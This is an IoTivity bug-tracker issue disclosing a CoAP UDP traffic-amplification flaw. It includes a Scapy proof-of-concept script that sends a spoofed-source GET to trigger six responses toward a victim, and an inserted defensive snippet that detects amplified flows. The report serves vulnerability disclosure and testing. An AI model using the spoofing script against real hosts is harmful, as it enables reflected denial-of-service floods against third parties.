IoTivity issue IOT-3267

Traffic amplification of UDP packets


    • Found in Version/s: Current (HEAD-5349dad)
    • Reproducibility: Always (100%)


      The IoTivity server in the current version (HEAD-5349dad, taken from GitHub) can be used to perform Distributed Denial of Service attacks, acting as a network amplifier when the source IP address is spoofed.

      After receiving a CoAP GET message (53 bytes long), the IoTivity server responds with 6 CoAP packets (each 62 bytes long):

      ###[ CoAP ]###
      ver = 1L
      type = CON
      tkl = 0L
      code = 4.01 Unauthorized
      msg_id = 1881
      token = ''
      options = [('Uri-Path', 'test')]
      paymark = ''

      Together all response packets total 372 bytes, which gives a 600% amplification factor (calculated as size_of_output/size_of_input - 1).
      The server responds to the IP address from the first packet without requiring any confirmation from the client, so this request can be used for Distributed Denial of Service with a spoofed source IP address.
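      As an added illustration (not part of this report or of the IoTivity code), the following Python 3 snippet decodes the report's request payload with a small RFC 7252 header parser and applies the report's amplification formula to constructed UDP flow records, flagging clients that receive far more CoAP bytes than they sent. The flow-record tuple format and the 192.0.2.x addresses are assumptions made for the demonstration.

```python
from collections import defaultdict

COAP_PORT = 5683
TYPES = ("CON", "NON", "ACK", "RST")
REPORT_REQUEST = bytes.fromhex("40010759b474657374")  # the report's CoAP GET payload


def parse_coap(data: bytes) -> dict:
    """Decode the RFC 7252 fixed header and collect Uri-Path (option 11) segments."""
    if len(data) < 4 or data[0] >> 6 != 1:
        raise ValueError("not a CoAP version 1 message")
    tkl = data[0] & 0x0F
    msg = {"type": TYPES[(data[0] >> 4) & 0x03],
           "code": f"{data[1] >> 5}.{data[1] & 0x1F:02d}",  # 0.01 = GET, 4.01 = Unauthorized
           "msg_id": int.from_bytes(data[2:4], "big"),
           "token": data[4:4 + tkl].hex(), "uri_path": []}
    i, number = 4 + tkl, 0
    while i < len(data) and data[i] != 0xFF:  # 0xFF would mark the payload start
        delta, length = data[i] >> 4, data[i] & 0x0F
        if delta >= 13 or length >= 13:  # extended encodings are not needed for this payload
            raise ValueError("extended option encoding not handled")
        number, i = number + delta, i + 1
        if number == 11:
            msg["uri_path"].append(data[i:i + length].decode("ascii"))
        i += length
    return msg


def amplification_factor(bytes_in: int, bytes_out: int) -> float:
    """The report's definition: size_of_output / size_of_input - 1."""
    return bytes_out / bytes_in - 1


def flag_amplified_clients(flows, threshold: float = 1.0) -> dict:
    """flows: (src_ip, sport, dst_ip, dport, nbytes) per UDP datagram (constructed format).
    Returns {client_ip: factor} for clients that received more than `threshold` extra bytes
    per byte they sent to the CoAP port; a spoofed victim address looks exactly like this."""
    sent, received = defaultdict(int), defaultdict(int)
    for src, sport, dst, dport, nbytes in flows:
        if dport == COAP_PORT:
            sent[src] += nbytes
        elif sport == COAP_PORT:
            received[dst] += nbytes
    return {c: amplification_factor(sent[c], received[c]) for c in sent
            if amplification_factor(sent[c], received[c]) > threshold}


# Constructed sample: one 53-byte GET answered by six 62-byte 4.01 responses, as in the
# report, plus a well-behaved client whose single request gets a single reply of equal size.
SAMPLE_FLOWS = [("192.0.2.10", 50000, "192.0.2.1", COAP_PORT, 53)]
SAMPLE_FLOWS += [("192.0.2.1", COAP_PORT, "192.0.2.10", 50000, 62)] * 6
SAMPLE_FLOWS += [("192.0.2.20", 40000, "192.0.2.1", COAP_PORT, 60),
                 ("192.0.2.1", COAP_PORT, "192.0.2.20", 40000, 60)]
```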

      The issue was tested and reproduced with the following example IoTivity server applications:

      • devicediscoveryserver
      • fridgeserver
      • garageserver
      • groupserver
      • lightserver
      • presenceserver
      • roomserver
      • simpleclientserver
      • simpleserver
      • simpleserverHQ

      The issue can be reproduced using the following Python 2 script (requires the Scapy library and sudo to spoof the source IP address):


      import sys
      from scapy.all import IP, UDP, Raw, sr

      # CoAP CON GET for Uri-Path "test" (msg_id 1881), as dissected above
      IOTIVITY_PAYLOAD = "40010759b474657374"
      data = IOTIVITY_PAYLOAD.decode('hex')  # Python 2 hex decoding
      # argv[1]/argv[2]: spoofed source IP and port; argv[3]: tested IoTivity server (CoAP port 5683)
      packet = IP(src=sys.argv[1], dst=sys.argv[3])/UDP(sport=int(sys.argv[2]), dport=5683)/Raw(data)
      # Send once and keep collecting answers for 5 s (multi=1 accepts several answers per probe)
      sr(packet, timeout=5, multi=1)


      Execution of the script:

      sudo python iotivity_test.py src_ip src_port dst_ip
      (where src_ip and src_port are the IP and port of the spoofed source client,
      and dst_ip is the IP of the tested IoTivity server, on port 5683)
      sudo python iotivity_test.py 50000

      For an IoTivity example application started with the following command on a server with IP=

      CoAP responses will be sent to






            • Assignee: avolkov (Aleksey Volkov)
              CVEReporting (CVE Reporting)
            • Votes: 0
            • Watchers: 3


              • Created: